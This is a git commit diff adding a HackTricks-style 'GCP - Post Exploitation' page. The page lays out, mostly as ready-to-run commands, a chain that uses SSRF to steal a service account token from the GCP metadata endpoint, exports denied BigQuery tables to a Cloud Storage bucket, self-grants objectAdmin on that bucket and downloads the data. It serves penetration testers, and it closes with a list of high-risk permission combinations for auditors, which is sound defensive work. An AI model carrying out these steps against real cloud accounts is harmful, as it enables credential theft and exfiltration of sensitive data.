mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-04-28 12:03:08 -07:00
Add content from: Can AI Attack the Cloud? Lessons From Building an Autonomous...
This commit is contained in:
@@ -1,3 +1,116 @@
|
||||
# GCP - Post Exploitation
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Common Cross-Service Post-Exploitation Path
|
||||
|
||||
A very common **GCP post-exploitation** situation is: you compromise a web application or workload running on a VM, abuse **SSRF** to reach the **metadata endpoint**, steal the **attached Service Account OAuth token**, and then pivot into the control plane with **legitimate API calls**.
|
||||
|
||||
This is specially useful when the compromised identity **cannot directly read the target data source**, but it **can still move data into a different service boundary** where the permissions are easier to abuse.
|
||||
|
||||
### 1. SSRF to metadata token theft
|
||||
|
||||
If an SSRF can reach the GCP metadata service, try to extract the token of the attached Service Account:
|
||||
|
||||
```bash
|
||||
curl -H "Metadata-Flavor: Google" \
|
||||
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
|
||||
```
|
||||
|
||||
Then identify who the token belongs to and its scopes:
|
||||
|
||||
```bash
|
||||
curl -H "Content-Type: application/x-www-form-urlencoded" \
|
||||
-d "access_token=<token>" \
|
||||
https://www.googleapis.com/oauth2/v1/tokeninfo
|
||||
```
|
||||
|
||||
Related pages:
|
||||
|
||||
{{#ref}}
|
||||
../gcp-services/gcp-compute-instances-enum/
|
||||
{{#endref}}
|
||||
|
||||
{{#ref}}
|
||||
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#gcp
|
||||
{{#endref}}
|
||||
|
||||
### 2. Enumerate datasets and test direct access first
|
||||
|
||||
With the stolen token, enumerate the reachable BigQuery datasets/tables and try a direct read first:
|
||||
|
||||
```bash
|
||||
export CLOUDSDK_AUTH_ACCESS_TOKEN="<token>"
|
||||
bq ls
|
||||
bq ls <proj>:<dataset>
|
||||
bq head <dataset>.<table>
|
||||
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table>` LIMIT 10'
|
||||
```
|
||||
|
||||
If direct access fails with **`Access Denied`**, don't stop there. Check whether the identity still has the permissions to **export** data out of BigQuery and **write** to Cloud Storage.
|
||||
|
||||
### 3. Bypass denied table reads via BigQuery export to GCS
|
||||
|
||||
If the compromised identity has **`bigquery.tables.export`**, **`bigquery.jobs.create`**, and access to write into a bucket, it may still be able to extract the table by exporting it to Cloud Storage:
|
||||
|
||||
```bash
|
||||
gcloud storage buckets create gs://<bucket-name> --location=<location>
|
||||
bq extract <dataset>.<table> "gs://<bucket-name>/table-*.csv"
|
||||
```
|
||||
|
||||
This is an important post-exploitation pattern: the attacker **doesn't need direct table read access** if they can force the data into a storage boundary they control.
|
||||
|
||||
Related pages:
|
||||
|
||||
{{#ref}}
|
||||
../gcp-services/gcp-bigquery-enum.md
|
||||
{{#endref}}
|
||||
|
||||
{{#ref}}
|
||||
../gcp-services/gcp-storage-enum.md
|
||||
{{#endref}}
|
||||
|
||||
### 4. Self-grant access on the destination bucket
|
||||
|
||||
Sometimes the export succeeds but the compromised identity still cannot **list** or **read** the exported objects. If it also has **`storage.buckets.setIamPolicy`** over the destination bucket, it can often fix that by granting itself **`roles/storage.objectAdmin`** (or another read-capable role):
|
||||
|
||||
```bash
|
||||
gcloud storage buckets add-iam-policy-binding gs://<bucket-name> \
|
||||
--member="serviceAccount:<sa-name>@<project-id>.iam.gserviceaccount.com" \
|
||||
--role="roles/storage.objectAdmin"
|
||||
```
|
||||
|
||||
Then retrieve the data:
|
||||
|
||||
```bash
|
||||
gcloud storage ls gs://<bucket-name>
|
||||
gcloud storage cat gs://<bucket-name>/<object-name>
|
||||
gcloud storage cp gs://<bucket-name>/<object-name> .
|
||||
```
|
||||
|
||||
This turns a limited identity with **export-only** style access into a practical data-exfiltration path. When auditing GCP permissions, treat the following combination as high-risk:
|
||||
|
||||
- **Metadata reachability** from exploitable applications
|
||||
- **`bigquery.tables.export`** + **`bigquery.jobs.create`**
|
||||
- **`storage.buckets.create`** and/or **`storage.objects.create`**
|
||||
- **`storage.buckets.setIamPolicy`** or equivalent bucket-IAM write access
|
||||
|
||||
### 5. Why this chain matters
|
||||
|
||||
This is not a new vulnerability class. The impact comes from **chaining** well-known primitives:
|
||||
|
||||
- SSRF gives access to the **metadata token**
|
||||
- The token gives access to **cloud APIs**
|
||||
- **BigQuery export** moves data out of the stricter boundary
|
||||
- **Bucket IAM modification** restores read access on the exfiltration location
|
||||
|
||||
The result is that an identity that cannot directly query a sensitive dataset may still be able to **steal it through GCS**.
|
||||
|
||||
## References
|
||||
|
||||
- [Can AI Attack the Cloud? Lessons From Building an Autonomous Cloud Offensive Multi-Agent System](https://unit42.paloaltonetworks.com/autonomous-ai-cloud-attacks/)
|
||||
- [Authenticate workloads to Google Cloud APIs using service accounts](https://cloud.google.com/compute/docs/access/authenticate-workloads)
|
||||
- [Export table data to Cloud Storage](https://cloud.google.com/bigquery/docs/exporting-data)
|
||||
- [IAM permissions for Cloud Storage](https://cloud.google.com/storage/docs/access-control/iam-permissions)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
Reference in New Issue
Block a user